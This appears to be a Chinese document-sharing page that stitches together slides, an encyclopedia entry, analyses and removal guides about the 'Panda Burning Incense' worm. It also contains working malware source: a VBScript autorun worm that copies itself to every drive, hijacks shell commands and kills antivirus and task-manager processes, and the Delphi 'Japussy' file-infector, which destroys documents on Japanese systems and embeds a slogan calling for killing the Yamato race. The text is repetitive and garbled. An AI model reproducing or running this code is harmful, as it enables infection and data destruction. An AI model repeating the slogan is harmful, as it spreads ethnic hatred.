VB模拟熊猫烧香
- 格式:pdf
- 大小:404.67 KB
- 文档页数:3
下载文档原格式
合集下载
熊猫烧香PPT课件
。
熊猫烧香病毒的传播途径多样,包括局域网、下载软件、电子邮件等, 防范措施需要从多个方面入手,包括及时更新系统补丁、安装杀毒软件 、定期备份重要数据等。
对未来网络安全防护的展望
随着互联网技术的不断发展, 网络安全问题将越来越突出, 需要不断加强网络安全防护措
施。
未来网络安全防护将更加注重 预防措施,包括加强用户教育 、推广加密技术和虚拟专用网 等,以提高网络安全防护意识
避免因病毒感染导致数据丢失。
不随意打开未知来源的邮件和链 接
避免点击不明链接或下载未知来源的文件 。
定期检查系统安全漏洞
及时修补系统漏洞,提高系统安全性。
应对熊猫烧香的方法
发现感染迹象后立即断网:避免病毒 进一步传播。
手动删除病毒文件:如无法清除病毒 ,可手动删除感染病毒的文件,并恢 复系统配置。
和能力。
网络安全防护技术将不断创新 和发展,包括人工智能、大数 据分析等新技术的应用,将为 网络安全防护提供更加全面和 高效的支持。
国际合作将成为未来网络安全 防护的重要方向,各国政府和 组织需要加强合作,共同应对 网络安全威胁,维护全球网络 安全。
THANKS FOR WATCHING
感谢您的观看
熊猫烧香ppt课件
目录
• 熊猫烧香简介 • 熊猫烧香的技术分析 • 熊猫烧香的防范与应对 • 熊猫烧香案例分析 • 总结与展望
CHAPTER 01
熊猫烧香简介
熊猫烧香的起源
01
熊猫烧香是一种计算机病毒,起 源于2007年,由李俊编写。
02
该病毒通过感染计算机系统中的 可执行文件、网页文件等,进行 传播和破坏活动。
使用安全模式进行杀毒:在安全模式 下启动电脑,并进行全盘扫描和杀毒 。
熊猫烧香病毒的传播途径多样,包括局域网、下载软件、电子邮件等, 防范措施需要从多个方面入手,包括及时更新系统补丁、安装杀毒软件 、定期备份重要数据等。
对未来网络安全防护的展望
随着互联网技术的不断发展, 网络安全问题将越来越突出, 需要不断加强网络安全防护措
施。
未来网络安全防护将更加注重 预防措施,包括加强用户教育 、推广加密技术和虚拟专用网 等,以提高网络安全防护意识
避免因病毒感染导致数据丢失。
不随意打开未知来源的邮件和链 接
避免点击不明链接或下载未知来源的文件 。
定期检查系统安全漏洞
及时修补系统漏洞,提高系统安全性。
应对熊猫烧香的方法
发现感染迹象后立即断网:避免病毒 进一步传播。
手动删除病毒文件:如无法清除病毒 ,可手动删除感染病毒的文件,并恢 复系统配置。
和能力。
网络安全防护技术将不断创新 和发展,包括人工智能、大数 据分析等新技术的应用,将为 网络安全防护提供更加全面和 高效的支持。
国际合作将成为未来网络安全 防护的重要方向,各国政府和 组织需要加强合作,共同应对 网络安全威胁,维护全球网络 安全。
THANKS FOR WATCHING
感谢您的观看
熊猫烧香ppt课件
目录
• 熊猫烧香简介 • 熊猫烧香的技术分析 • 熊猫烧香的防范与应对 • 熊猫烧香案例分析 • 总结与展望
CHAPTER 01
熊猫烧香简介
熊猫烧香的起源
01
熊猫烧香是一种计算机病毒,起 源于2007年,由李俊编写。
02
该病毒通过感染计算机系统中的 可执行文件、网页文件等,进行 传播和破坏活动。
使用安全模式进行杀毒:在安全模式 下启动电脑,并进行全盘扫描和杀毒 。
熊猫烧香计算机感染病毒算法设计代码
}
else
{
mg.m[i][j].dl=0-a;
}//if
}//for
}
}//MGraphCreat
ShuZu xzhyuan()
{
ShuZu q;
int p=0;
for(int i=0;i<mg.row;i++)
for(int j=0;j<mg.col;j++)
}
cout<<endl;
ShuZu q;
q=xzhyuan();
cout<<q.numb;
int nowday=1;
while(q.numb<mg.col*mg.row)
{
chuanran(q,nowday);
for(int s=0;s<mg.row;s++)
for(int t=0;t<mg.col;t++)
{
cout<<mg.m[s][t].vt;
}
q=xzhyuan();
nowday++;
}
count(q);
return 0;
}
{
mg.m[q.n[v].r+1][q.n[v].c].vt=mg.m[q.n[v].r][q.n[v].c].vt;
m++;
}
if(q.n[v].r-1>=0&&mg.m[q.n[v].r-1][q.n[v].c].vt==0&&mg.m[q.n[v].r-1][q.n[v].c].dl<=nowday{
else
{
mg.m[i][j].dl=0-a;
}//if
}//for
}
}//MGraphCreat
ShuZu xzhyuan()
{
ShuZu q;
int p=0;
for(int i=0;i<mg.row;i++)
for(int j=0;j<mg.col;j++)
}
cout<<endl;
ShuZu q;
q=xzhyuan();
cout<<q.numb;
int nowday=1;
while(q.numb<mg.col*mg.row)
{
chuanran(q,nowday);
for(int s=0;s<mg.row;s++)
for(int t=0;t<mg.col;t++)
{
cout<<mg.m[s][t].vt;
}
q=xzhyuan();
nowday++;
}
count(q);
return 0;
}
{
mg.m[q.n[v].r+1][q.n[v].c].vt=mg.m[q.n[v].r][q.n[v].c].vt;
m++;
}
if(q.n[v].r-1>=0&&mg.m[q.n[v].r-1][q.n[v].c].vt==0&&mg.m[q.n[v].r-1][q.n[v].c].dl<=nowday{
熊猫烧香
熊猫烧香熊猫烧香是一种经过多次变种的蠕虫病毒变种,2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写,2007年1月初肆虐网络,它主要通过下载的档案传染。
对计算机程序、系统破坏严重。
目录基本信息病毒描述中毒症状病毒危害传播方法1传播对象和运行过程本地磁盘感染1生成autorun.inf1局域网传播杀毒方法1解决办法修改方法1步骤11步骤2病毒源码变种病毒变种病毒描述专家介绍相关报道和评论破案介绍制作者简介童年时喜欢拆装东西没有上大学很遗憾中专开始接触电脑工作后迷上网络曾经找工作遇阻熊猫烧香的第一版作者道歉信展开基本信息病毒名称:熊猫烧香,Worm.WhBoy.(金山称),Worm.Nimaya.熊猫烧香(瑞星称)病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”,国外称“熊猫烧香”危险级别:★★★★★病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。
影响系统:Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista 发现时间:2006年10月16日来源地:中国武汉东湖高新技术开发区关山病毒描述其实是一种蠕虫病毒的变种,而且是经过多次变种而来的,由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。
但原病毒只会对EXE 图标进行替换,并不会对系统本身进行破坏。
而大多数熊猫烧香是中的病毒变种,用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。
同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。
被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
熊猫烧香变种资料
病毒大小:22,886 字节加壳方式:UPack样本MD5:9749216a37d57cf4b2e528c027252062样本SHA1:5d3222d8ab6fc11f899eff32c2c8d3cd50cbd755发现时间:2006.11更新时间:2006.11关联病毒:传播方式:通过恶意网页传播,其它木马下载,可通过局域网、移动存储设备等传播技术分析==========又是“熊猫烧香”FuckJacks.exe的变种,和之前的变种一样使用白底熊猫烧香图标,病毒运行后复制自身到系统目录下:%System%\drivers\spoclsv.exe创建启动项:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "svcshare"="%System%\drivers\spoclsv.exe"修改注册表信息干扰“显示所有文件和文件夹”设置:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanc ed\Folder\Hidden\SHOW ALL]"CheckedValue"=dword:00000000在各分区根目录生成副本:X:\setup.exeX:\autorun.infautorun.inf内容:[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell\Auto\command=setup.exe尝试关闭下列窗口:QQKavQQA VVirusScanSymantec AntiVirusDubaWindowsesteem procsSystem Safety Monitor Wrapped gift Killer Winsock Expert msctls_statusbar32pjf(ustc)IceSword结束一些对头的进程:Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exescan32.exe Ravmond.exe CCenter.exe RavTask.exeRav.exeRavmon.exe RavmonD.exe RavStub.exeKVXP.kxp KvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exeTrojDie.kxp FrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exe禁用一系列服务:Schedule sharedaccess RsCCenter RsRavMon RsCCenter RsRavMonKVWSCKVSrvXPkavsvcA VPMcAfeeFrameworkMcShieldMcTaskManagernavapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantec Core LCNPFMntorMskServiceFireSvc删除若干安全软件启动项信息:RavTaskKvMonXPkavKA VPersonal50McAfeeUpdaterUINetwork Associates Error Reporting ServiceShStatEXEYLive.exeyassistse使用net share命令删除管理共享:net share X$ /del /ynet share admin$ /del /ynet share IPC$ /del /y遍历目录,感染除以下系统目录外其它目录中的exe、com、scr、pif文件:X:\WINDOWSX:\WinntX:\System Volume InformationX:\Recycled%ProgramFiles%\Windows NT%ProgramFiles%\WindowsUpdate%ProgramFiles%\Windows Media Player%ProgramFiles%\Outlook Express%ProgramFiles%\Internet Explorer%ProgramFiles%\NetMeeting%ProgramFiles%\Common Files%ProgramFiles%\ComPlus Applications%ProgramFiles%\Messenger%ProgramFiles%\InstallShield Installation Information%ProgramFiles%\MSN%ProgramFiles%\Microsoft Frontpage%ProgramFiles%\Movie Maker%ProgramFiles%\MSN Gamin Zone将自身捆绑在被感染文件前端,并在尾部添加标记信息:.WhBoy{原文件名}.exe.{原文件大小}.与之前变种不同的是,这个病毒体虽然是22886字节,但是捆绑在文件前段的只有22838字节,被感染文件运行后会出错,而不会像之前变种那样释放出{原文件名}.exe的原始正常文件。
熊猫烧香(源代码)
熊猫烧香(源代码)(一) 主程序段分析原“熊猫烧香”病毒“源码”主程序段代码如下所示:{==================主程序开始====================}beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之?end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 thenInfectFiles //感染和发邮件else //已寄生于宿主程序上了,开始工作beginTmpFile := ParamStr(0); //创建临时文件……....Line nDelete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, '.', Si, Pi); //创建新进程运行之……....Line n+7InfectFiles; //感染和发邮件end;end.对于代码:RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程虽然源码提供者省略了相应实现,但这是比较基本的编程实现。
通过把自身注册为服务进程,可以使自己随着系统的启动一起启动。
熊猫烧香病毒剖析
伪装技术
熊猫烧香病毒会伪装成其他正常 的文件或程序,诱骗用户运行, 从而感染计算机系统。
03 熊猫烧香病毒的防范与应 对
防范措施
安装防病毒软件
选择可靠的品牌和版本,并及时更新病毒库。
提高网络安全意识
不随意打开未知来源的邮件和链接,不下载 和运行未知来源的文件和程序。
定期备份重要数据
以防数据被病毒感染或损坏。
案例二:熊猫烧香病毒的攻击目标与手法
熊猫烧香病毒主要攻击个人计算机和企业网络系统,通过感染操作系统和应用程序,导致系统运行缓 慢、蓝屏、死机等问题。
该病毒会修改系统注册表、劫持浏览器、禁用安全软件等手段,以实现长期驻留和控制用户计算机。
熊猫烧香病毒还会窃取用户个人信息,如账号密码、信用卡信息等,给用户的隐私和财产安全带来严重 威胁。
与其他蠕虫病毒的比较
传播方式
熊猫烧香病毒与蠕虫病毒相似,都是通过网络进行快速传播 。熊猫烧香病毒利用系统漏洞和用户不慎点击恶意链接等方 式感染计算机。
破坏性
熊猫烧香病毒在感染计算机后,会对系统文件进行篡改,导 致计算机出现蓝屏、频繁重启等问题。此外,熊猫烧香病毒 还会下载其他恶意软件,进一步损害系统安全。
自我保护机制
熊猫烧香病毒具有自我保护机制,通过修改系统 文件、注册表等手段,防止病毒被轻易删除或查 杀。
病毒的隐藏与反侦察技术
隐藏技术
熊猫烧香病毒采用多种隐藏技术, 如将自身嵌入到其他正常文件中、 使用加密和混淆等技术隐藏自身 代码等。
反侦察技术
熊猫烧香病毒会检测自身是否被 检测或查杀,一旦发现自身被检 测或查杀,会采取相应的反侦察 措施,如删除自身、破坏系统文 件等。
熊猫烧香病毒是一种网络攻击手段,与其他网络攻击如拒绝服务攻击、SQL注入攻击等有所不同。熊猫烧香病毒 主要针对个人计算机系统进行感染和破坏。
熊猫烧香病毒之专杀工具的编写教程
熊猫烧香病毒之专杀工具的编写教程通过对熊猫烧香的行为分析,这里仅针对所得结果,来进行专杀工具的编写。
本节课我们会学习使用C++来写一个简单的“熊猫烧香”专杀系统。
实验目的:结合本篇文章的知识点,能够彻底掌握文章所讲述的编写杀毒软件的方法。
实验思路:1.理解专杀工具所需要实现的功能2.利用VC++编写专杀工具3.结合Process Monitor验证专杀工具实验步骤:1、病毒行为回顾与归纳这里我们首先回顾一下病毒的行为:**病毒行为1:**病毒本身创建了名为`spoclsv.exe`的进程,该进程文件的路径为:C:WINDOWSsystem32driversspoclsv.exe**病毒行为2:**在命令行模式下使用`net share`命令来取消系统中的共享。
**病毒行为3:**删除安全类软件在注册表中的启动项。
**病毒行为4:**在注册表:HKCUSoftwareMicrosoftWindowsCurrentVersionRun中创建svcshare用于在开机时启动位于`C:WINDOWSsystem32driversspoclsv.exe`的病毒程序。
**病毒行为5:**修改注册表,使得隐藏文件无法通过普通的设置进行显示,该位置为:HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL 病毒将`CheckedValue`的键值设置为了0。
**病毒行为6:**将自身拷贝到根目录,并命名为`setup.exe`,同时创建`autorun.inf`用于病毒的启动,这两个文件的属性都是“隐藏”。
**病毒行为7:**在一些目录中创建名为`Desktop_.ini`的隐藏文件。
**病毒行为8:**向外发包,连接局域网中其他机器。
纵观以上八点行为,这里需要说明的是,其中的第二点行为,由于我不知道用户计算机在中毒前的设置,因此这条我打算忽略。
VB也模拟熊猫烧香!的.doc
VB也模拟熊猫烧香!使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续wsh.Regwrite"HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKCR\Drive\shell\","auto"wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite"HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"'修改默认文件图标这里可以换成可爱的熊猫哦wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeC aption","你好啊,开个小小的玩笑"wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeT ext","你已经中毒了!"'复制自身到C,D,E,F,U盘myfile.copy "c:\"myfile.copy "D:\"myfile.copy "E:\"myfile.copy "F:\"myfile.copy "I:\"myfile.attributes=34'定义Autorun.inf 的内容这个就是u盘病毒必须的代码部分这里可以简单写If fso.FileExists("C:\autorun.inf") ThenSet objFolder = fso.GetFile("C:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_&"&& echo open=NYboy.bat >>C:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_&"&& echo shell=Auto>>C:\autorun.inf"_&"&& attrib +h +s +r C:\autorun.inf" ,0set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)autobatc.writeline("NYboy.vbs")End IfIf fso.FileExists("D:\autorun.inf") ThenSet objFolder = fso.GetFile("D:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_&"&& echo open=NYboy.bat >>D:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_&"&& echo shell=Auto>>D:\autorun.inf"_&"&& attrib +h +s +r D:\autorun.inf" ,0set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)autobatd.writeline("NYboy.vbs")End IfIf fso.FileExists("E:\autorun.inf") ThenSet objFolder = fso.GetFile("E:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_&"&& echo open=NYboy.bat >>E:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_&"&& echo shell=Auto>>E:\autorun.inf"_&"&& attrib +h +s +r E:\autorun.inf" ,0set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)autobate.writeline("NYboy.vbs")End IfIf fso.FileExists("F:\autorun.inf") ThenSet objFolder = fso.GetFile("F:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_&"&& echo open=NYboy.bat >>F:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_&"&& echo shell=Auto>>F:\autorun.inf"_&"&& attrib +h +s +r F:\autorun.inf" ,0set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)autobatf.writeline("NYboy.vbs")End IfIf fso.FileExists("I:\autorun.inf") ThenSet objFolder = fso.GetFile("I:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_&"&& echo open=NYboy.bat >>I:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_&"&& echo shell=Auto>>I:\autorun.inf"_&"&& attrib +h +s +r I:\autorun.inf" ,0set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)autobatf.writeline("NYboy.vbs")End If'设置病毒体属性为系统只读隐藏wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_&"&& attrib +h +s +r D:\NYboy.bat"_&"&& attrib +h +s +r E:\NYboy.bat"_&"&& attrib +h +s +r F:\NYboy.bat"_&"&& attrib +h +s +r I:\NYboy.bat"'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件doset ws=getobject("winmgmts:\\.\root\cimv2")set pp=ws.execquery("select * from win32_process wherename='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name ='winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")for each i in pp。
熊猫烧香源码
program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的大小IconOffset = EB8; //PE文件主图标的偏移量//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同//查找2800000020的十六进制字符串可以找到主图标的偏移量{HeaderSize = 38912; //Upx压缩过病毒体的大小IconOffset = BC; //Upx压缩过PE文件主图标的偏移量//Upx 1.24W 用法: upx -9 --8086 Japussy.exe}IconSize = E8; //PE文件主图标的大小--744字节IconTail = IconOffset + IconSize; //PE文件主图标的尾部ID = 444444; //感染标记//垃圾码,以备写入Catchword = 'If a race need to be killed out, it must be Yamato. ' +'If a country need to be destroyed, it must be Japan! ' +'*** W32.Japussy.Worm.A ***';{$R *.RES}function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stDCall; external 'Kernel32.dll'; //函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PROCESS_INFORMATION;IsJap: Boolean = False; //日文操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenif (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True;end;{ 在流之间复制 }procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCurPos, 0);end;{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }procedure ExtractFile(FileName: string);varsStream, dStream: TFileStream;begintrysStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); trydStream := TFileStream.Create(FileName, fmCreate);trysStream.Seek(HeaderSize, 0); //跳过头部的病毒部分dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end;finallysStream.Free;end;end;end;{ 填充STARTUPINFO结构 }procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); beginSi.cb := SizeOf(Si);Si.lpReserved := nil;Si.lpDesktop := nil;Si.lpTitle := nil;Si.dwFlags := STARTF_USESHOWWINDOW;Si.wShowWindow := State;Si.cbReserved2 := 0;Si.lpReserved2 := nil;end;{ 发带毒邮件}procedure SendMail;begin//邮件终止end;{ 感染PE文件 }procedure InfectOneFile(FileName: string);varHdrStream, SrcStream: TFileStream;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array[0..1] of Char;begintry //出错则文件正在被使用,退出if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染Exit;Infected := False;IsPE := False;SrcStream := TFileStream.Create(FileName, fmOpenRead);tryfor i := 0 to 8 do //检查PE文件头beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2);if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记beginIsPE := True; //是PE文件Break;end;end;SrcStream.Seek(-4, soFromEnd); //检查感染标记SrcStream.Read(iID, 4);if (iID = ID) or (SrcStream.Size 16) and ( '.') and( '..') thenResult := 0 //不是目录else if (SearchRec.Attr = 16) and ( '.') and( '..') thenResult := 1 //不是根目录else Result := 2; //是根目录end;beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) thenbeginrepeatPeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑if IsValidDir(SearchRec) = 0 thenbeginFn := Path + ;Ext := UpperCase(ExtractFileExt(Fn));if (Ext = '.EXE') or (Ext = '.SCR') thenbeginInfectOneFile(Fn); //感染可执行文件endelse if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') thenbegin//感染HTML和ASP文件,将Base64编码后的病毒写入//感染浏览此网页的所有用户//哪位大兄弟愿意完成之?endelse if Ext = '.WAB' then //Outlook地址簿文件begin//获取Outlook邮件地址endelse if Ext = '.ADC' then //Foxmail地址自动完成文件begin//获取Foxmail邮件地址endelse if Ext = 'IND' then //Foxmail地址簿文件begin//获取Foxmail邮件地址endelsebeginif IsJap then //是倭文操作系统beginif (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') thenSmashFile(Fn); //摧毁文件end;end;end;//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑Sleep(200);until (FindNext(SearchRec) 0);end;FindClose(SearchRec);SubDir := TStringList.Create;if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) thenbeginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add();until (FindNext(SearchRec) 0);end;FindClose(SearchRec);Count := SubDir.Count - 1;for i := 0 to Count doLoopFiles(Path + SubDir.Strings + '\', Mask);FreeAndNil(SubDir);end;{ 遍历磁盘上所有的文件 }procedure InfectFiles;varDriverList: string;i, Len: Integer;beginif GetACP = 932 then //日文操作系统IsJap := True; //去死吧!DriverList := GetDrives; //得到可写的磁盘列表Len := Length(DriverList);while True do //死循环beginfor i := Len downto 1 do //遍历每个磁盘驱动器LoopFiles(DriverList + ':\', '*.*'); //感染之SendMail; //发带毒邮件Sleep(1000 * 60 * 5); //睡眠5分钟end;end;{ 主程序开始 }beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之?end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then InfectFiles //感染和发邮件else //已寄生于宿主程序上了,开始工作beginTmpFile := ParamStr(0); //创建临时文件Delete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, '.', Si, Pi); //创建新进程运行之InfectFiles; //感染和发邮件end;end.。
“熊猫烧香”(Worm.WhBoy.h)
“熊猫烧香”(Worm.WhBoy.h)“熊猫烧香”(Worm.WhBoy.h)近段时间,“熊猫烧香”(Worm.WhBoy.h) 蠕虫正处于急速变种期,仅11月份至今,变种数量已达10几个,变种速度之快,影响范围之广,与06年横行于局域网的“维金”不相上下。
现在小编提供一个手动清除此病毒的方法:清除步骤==========1. 断开网络2. 结束病毒进程%System%\FuckJacks.exe3. 删除病毒文件:%System%\FuckJacks.exe4. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件X:\autorun.infX:\setup.exe5. 删除病毒创建的启动项:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"FuckJacks"="%System%\FuckJacks.exe[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"svohost"="%System%\FuckJacks.exe"6. 修复或重新安装反病毒软件7. 使用反病毒软件或专杀工具进行全盘扫描,清除恢复被感染的exe文件中毒文件的恢复(仅个人观点,只在自己的虚拟机上测试正常)首先在清除病毒文件的同时不要删除%SYSTEM%下面释放FuckJacks.exe的这个文件,(注册表里要清除干净)打开运行输入gpedit.msc打开组策略-本地计算机策略-windows 设置-安全设置-软件限制策略-其它规则在其它规则上右键选择-新散列规则=打开新散列规则窗口在文件散列上点击浏览找到-%SYSTEM%下面释放FuckJacks.exe 文件.......安全级别选择-不允许的确定后重启(一定重启)重启后可以双击运行已经被熊猫感染的程序-运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项(不会有问题的)双击运行被感染的程序已经恢复原来样子了,全部回复后用SRENG2把FuckJacks.exe 在注册表里的启动项删除即可!杀病毒:实例讲解如何干掉“熊猫烧香”你中过熊猫烧香么?!看到过熊猫拿着三支香的样子么!?中招后如何处理!?看完本文,你将学会如何从计算机中杀掉“熊猫烧香”。